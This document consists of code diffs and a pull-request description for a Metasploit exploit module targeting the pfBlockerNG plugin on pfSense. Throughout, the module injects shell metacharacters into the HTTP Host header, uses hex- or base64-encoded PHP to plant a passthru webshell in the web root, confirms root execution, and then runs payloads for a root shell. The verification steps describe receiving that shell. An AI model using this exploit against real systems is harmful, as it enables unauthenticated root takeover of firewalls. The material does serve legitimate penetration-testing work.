-    Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if res.nil? || res.body.nil? || !res.body.include?('uid=0(root) gid=0(wheel)')
-    Exploit::CheckCode::Vulnerable('Confirmed that command injection as root is possible')
+    return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_for_shell.nil? || check_for_shell.body.nil? || !check_for_shell.body.include?('uid=0(root) gid=0(wheel)')
+
+    Exploit::CheckCode::Vulnerable
   end
 
   def execute_command(cmd, _opts = {})
@@ -122,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    upload_shell
+    upload_shell unless datastore['AutoCheck']
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
     case target['Type']
     when :unix_cmd

--- a/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
+++ b/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('WEBSHELL_NAME', [
-          false, 'The name of the uploaded webshell. This value is randomly set with a specific length if unset. The webshell filename has to be a specific length in order for the exploit to be successful, either: 5, 8, 11, 14, 17 (not including the .php exetention) ', nil
+          false, 'The name of the uploaded webshell. This value is randomly set with a specific length if unset.', nil
         ])
       ]
     )
@@ -109,14 +109,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    res = send_request_cgi({
+    send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, "#{@webshell_name}"),
+      'uri' => normalize_uri(target_uri.path, @webshell_name),
       'headers' => {
         'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8'
       },
       'vars_post' => {
-        'c' => "#{cmd}"
+        'c' => cmd
       }
     })
   end

--- a/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
+++ b/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
@@ -71,27 +71,42 @@ class MetasploitModule < Msf::Exploit::Remote
       )
     )
 
+
     register_options(
       [
         OptString.new('WEBSHELL_NAME', [
-          false, 'The name of the uploaded webshell. This value is randomly set with a specific length if unset. The webshell filename has to be a specific length in order for the exploit to be successful, either: 5, 8, 11, 14, 17... (not including the .php exetention)  ', nil
+          false, 'The name of the uploaded webshell. This value is randomly set with a specific length if unset. The webshell filename has to be a specific length in order for the exploit to be successful, either: 5, 8, 11, 14, 17 (not including the .php exetention) ', nil
         ])
       ]
     )
   end
 
-  def check
-    res = send_request_cgi(
+  def upload_shell
+    print_status 'Uploading shell...'
+    @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(8..16)}.php"
+    print_status("Webshell name is: #{@webshell_name}")
+    web_shell_contents = <<~EOF
+      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php print(passthru( $_GET["c"]));');
+    EOF
+    encoded_php = web_shell_contents.unpack('H*')[0].upcase
+    send_request_raw(
       'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
-      'method' => 'GET'
+      'headers' => {
+        'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"
+      }
     )
+    sleep datastore['WfsDelay']
+  end
 
-    return Exploit::CheckCode::Safe('Could not connect to web service - no response') if res.nil?
-    return Exploit::CheckCode::Safe("pfBlockerNG does not appear to be installed - (response code: #{res.code})") if res.code != 200
-
-    if res.body.include?('GIF') && res.headers['Content-Type'] == 'image/gif'
-      Exploit::CheckCode::Appears
-    end
+  def check
+    res =  send_request_raw(
+      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
+      'headers' => {
+        'Host' => "' *; getmyuid | php; '"
+      }
+    )
+    Exploit::CheckCode::Safe("Error uploading shell, the system is likely patched.") if res.nil? || res.body.nil? || !res.body.include?('uid=0(root) gid=0(wheel)')
+    Exploit::CheckCode::Vulnerable("Confirmed that command injection as root is possible")
   end
 
   def execute_command(cmd, _opts = {})
@@ -108,39 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status 'Uploading shell...'
-    # The webshell filename has to be a specific length in order for the exploit to be successful, either: 5, 8, 11, 14, 17...
-    @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha([5, 8, 11, 14, 17].sample)}.php"
-
-    fail_with(Failure::BadConfig, 'WEBSHELL_NAME, is not the correct length, please the module docs for more info') unless @webshell_name.length == (9 || 12 || 15 || 18 || 21)
-
-    print_status("Webshell name is: #{@webshell_name}")
-
-    web_shell_contents = <<~EOF
-      <?$a=fopen("/usr/local/www/#{@webshell_name}","w") or die();$t='<?php print(passthru( $_GET["c"]));?>';fwrite($a,$t);fclose( $a);?>
-    EOF
-
-    send_request_raw(
-      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
-      'headers' => {
-        'Host' => "' *; echo '#{Rex::Text.encode_base64(web_shell_contents)}'|python3.8 -m base64 -d | php; '"
-      }
-    )
-
-    sleep datastore['WfsDelay']
-    check_for_shell = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}?c=id")
-    )
-
-    fail_with(Failure::UnexpectedReply, 'Error uploading shell, the system is likely patched ') if check_for_shell.nil? || check_for_shell.body.nil?
-
-    if check_for_shell.body.include?('uid=0(root) gid=0(wheel)')
-      print_good("Upload succeeded, response from running id command: #{check_for_shell.body}")
-    else
-      fail_with(Failure::UnexpectedReply, 'Error uploading shell, the system is likely patched')
-    end
-
+    upload_shell
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
     case target['Type']
     when :unix_cmd

--- a/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
+++ b/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb
@@ -71,7 +71,6 @@ class MetasploitModule < Msf::Exploit::Remote
       )
     )
 
-
     register_options(
       [
         OptString.new('WEBSHELL_NAME', [
@@ -86,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(8..16)}.php"
     print_status("Webshell name is: #{@webshell_name}")
     web_shell_contents = <<~EOF
-      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php print(passthru( $_GET["c"]));');
+      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php print(passthru( $_POST["c"]));');
     EOF
     encoded_php = web_shell_contents.unpack('H*')[0].upcase
     send_request_raw(
@@ -99,25 +98,25 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    res =  send_request_raw(
+    res = send_request_raw(
       'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
       'headers' => {
         'Host' => "' *; getmyuid | php; '"
       }
     )
-    Exploit::CheckCode::Safe("Error uploading shell, the system is likely patched.") if res.nil? || res.body.nil? || !res.body.include?('uid=0(root) gid=0(wheel)')
-    Exploit::CheckCode::Vulnerable("Confirmed that command injection as root is possible")
+    Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if res.nil? || res.body.nil? || !res.body.include?('uid=0(root) gid=0(wheel)')
+    Exploit::CheckCode::Vulnerable('Confirmed that command injection as root is possible')
   end
 
   def execute_command(cmd, _opts = {})
-    send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}?c=#{Rex::Text.uri_encode(cmd)}"),
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, "#{@webshell_name}"),
       'headers' => {
-        'Accept' => '*/*',
-        'Accept-Language' => 'en-US,en;q=0.5',
-        'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8',
-        'Connection' => 'keep-alive'
+        'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8'
+      },
+      'vars_post' => {
+        'c' => "#{cmd}"
       }
     })
   end


### PR DESCRIPTION
This module exploits a vulnerability in the pfSense plugin, pfBlockerNG that allows remote unauthenticated
attackers to execute execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header.
Versions =< 2.1.4_26 are vulnerable, note that version 3.X is unaffected.

## Verification

List the steps needed to make sure this thing works


- [ ] Start `msfconsole`
- [ ] Do: `use unix/http/pfsense_pfblockerng_webshell`
- [ ] Set the RHOST, LHOST options
- [ ] Run the module
- [ ] Receive a cmd shell as the root user